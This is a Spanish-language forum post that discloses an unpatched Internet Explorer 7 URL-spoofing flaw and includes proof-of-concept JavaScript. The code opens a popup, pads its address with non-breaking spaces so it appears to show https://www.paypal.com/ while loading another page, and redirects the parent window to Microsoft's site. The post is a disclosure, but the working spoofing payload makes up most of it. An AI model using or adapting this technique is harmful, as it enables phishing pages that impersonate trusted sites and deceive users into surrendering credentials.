Bueno... después de tanto tiempo les dejo una vulnerabilidad en IE7 que lleva mas de 300 dias sin solucionarse y consiste en levantar un popup con una web y una URL distintas.
El PoC lo puse acáOtra muestra está en Secunia acá<p><a href="javascript:StartTest();"><font color="#000000">Comenzar</font></a></p>
<script language="javascript">
function StartTest()
{
var padding = '';
for ( i=0 ; i<108 ; i++)
{
padding += unescape("%A0");
}
newWindow = window.open("", "Win", "width=500,height=325,scrollbars=yes");
newWindow.moveTo( (screen.width-325) , 0 );
newWindow.document.location = "resultado.php/?" + unescape("%A0") + unescape("%A0") + "https://www.paypal.com/"+padding;
document.location = "http://www.microsoft.com/windows/ie/default.mspx";
}
</script>
</html>
Autor
En línea
